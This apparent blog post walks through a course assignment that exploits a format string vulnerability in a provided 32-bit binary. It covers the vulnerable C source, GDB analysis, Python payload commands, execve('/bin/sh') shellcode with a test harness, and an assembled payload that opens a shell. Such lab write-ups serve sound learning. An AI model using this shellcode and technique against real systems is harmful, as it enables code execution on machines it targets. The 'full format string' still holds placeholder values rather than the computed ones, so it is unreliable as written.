Alexander Lee

Posted on Oct 4

Journey to understand format string attack (Part 2)

#formatstring #exploit

Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda

In Part 1, one of the motivations that made me write these posts were because it took me a freaking long time to understand how format string attack works. To give you some context, I first knew about it in late 2021/early 2022. Took me a good 2.5 years to fully understand how it works. Still, I wanted to share my learning journey and where I eventually ended in.

The Task

Here, I will move on to talk about the assignment that helped propelled me into the journey. In my assignment, I was asked to run a shellcode using a "memory exploit" in the program. The source code was provided and it looked something like that:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vul1(char *arg)
{
  char buffer[400];
  snprintf(buffer, sizeof buffer, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "cstarget: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  vul1(argv[1]);

  return 0;
}

The code can be compiled in gcc using the following flags:

-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector

Unfortunately, the source code and compilation flags were only for references. I had to perform the attack on the given binary, with ASLR turned off.

Analysis

First of all, we can see that the binary needs to run with one, and only one argument.

Then it will use snprintf to print this argument into a buffer of 400 chars. Initially, I thought this can be done using buffer overflow but snprintf is checking against the size of buffer. So this makes BoF attack unviable.

We are talking about format string vulnerabilities right? Guess what? We have snprintf!

snprintf does not produce an output. It basically prints the specified string till a specified length in the specified format to a buffer. A quick run on the binary with argument also confirms that.

No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.

From the screenshots, I noticed that buffer is at $esp. My return address is stored from +0x198 from buffer. In any case, I knew that the saved instruction address is 0x56556236.

The simplest approach is to have this address overridden to run my shellcode. Since the stack is executable, there are 3 potential places where I can run the shellcodes: buffer, arg and environment variables. I chose buffer as it is the easiest.

In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs into the stack.

Note that the start of buffer changes as the size of the argument for vul1 increases. This is kind of expected. Remember my uglily drawn stack in Part 1:

Since parameters are placed before the return address, a parameter of bigger size will definitely push the stack further down.

Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we formulate the format string right, we can get the addresses right where we want it.

The format string

In this round, my approach will be:

<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n

Shellcode + NOPs = 64 bytes (you can try any number that is multiple of 4)
address1 = the stack memory address that holds the return address
address2 = basically address1 + 0x2
A = lower order of the starting address of buffer - 64 - 8
B = higher order of starting address of buffer - lower order of starting address of buffer
G = (64 / 4) + 1
H = G + 1

Sounds abstract? I guessed it. Let's use Excel to visualize the stack.

Few observations here:

The shellcode is at the start of the buffer. This is because the starting address of the buffer is relatively easier to obtain. Not everyday is a Saturday, so when you get the chance to be lazy, you take it.
The NOPs are there to align the stack. Imagine if we do not have the NOPs, this will happen

We will not be able to obtain the full addresses. Setting the NOP paddings assure us that our addresses will always be on the 17th and 18th position of the stack. (Take 1 position on the stack as 4 bytes, since we are working on 32 bits)

Finding the addresses

I like to break my tasks down into smaller pieces. Let's break the format string into steps.

64 NOPs - They are placeholders for the shellcode

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)")

64 NOPs + the 2 placeholder addresses

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")

The entire format string in placeholder values

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")

From here, we know that our shellcodes will start at 0xffffcdb4. We also know that the saved eip will be 0xffffcf4c. With these information:
address1 = \x4c\xcf\xff\xff
address2 = \x4e\xcf\xff\xff
A = 0xcdb4 - 72 = 52588
B = 0xffff - 0xcdb4 = 12875

The shellcode

For the purpose of the exercise, we will use the following shellcode from this article:

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"

The next question is, how do we know if the shellcode works? We can test it with a simple C program.

// Filename: shellcode.c
// Compile:  gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode

#include<stdio.h>
#include<string.h>

void callShell() {
        const char code[] = \
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        printf("Shellcode Length: %d\n", strlen(code));

        ((void(*)(void))code)();

}

void main()
{
        callShell();
}

Nice, the length of the shellcode is 45, so we will just need 19 more NOPs to pad it. Some of you may have noticed that I could have just pad 3 more NOPs. But I like 64, so I go with 64.

shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

The full format string should be:

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\xff\xee\xee\xee\xee%12345x%17$x%12345x%18$x

Now we will test it out:

YES! A shell is opened. Mission accomplished? Not quite. There are more to the assignment, but it is beyond the scope of this write-up.

...One more thing

In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to get segmentation faults when working with format string attacks. It will be frustrating for beginners like me. I found that, the best thing to do is to break the tasks down into smaller pieces, and figure the smaller pieces individually.

To quote Dr Andrew Wiles: I think I'll stop here.

DEV Community

Journey to understand format string attack (Part 2)

The Task

Analysis

The format string

Finding the addresses

The shellcode

...One more thing

Top comments (0)

Read next

Technical Interview - Boilerplate 2 - Node + Serverless + AWS + Github Actions

Should You Customize Your Resume for Every Job? Here's What I Learned After Applying to 100 Roles

Git stash comprehensive guide

How Edge Computing is Revolutionizing Data Processing and IoT Applications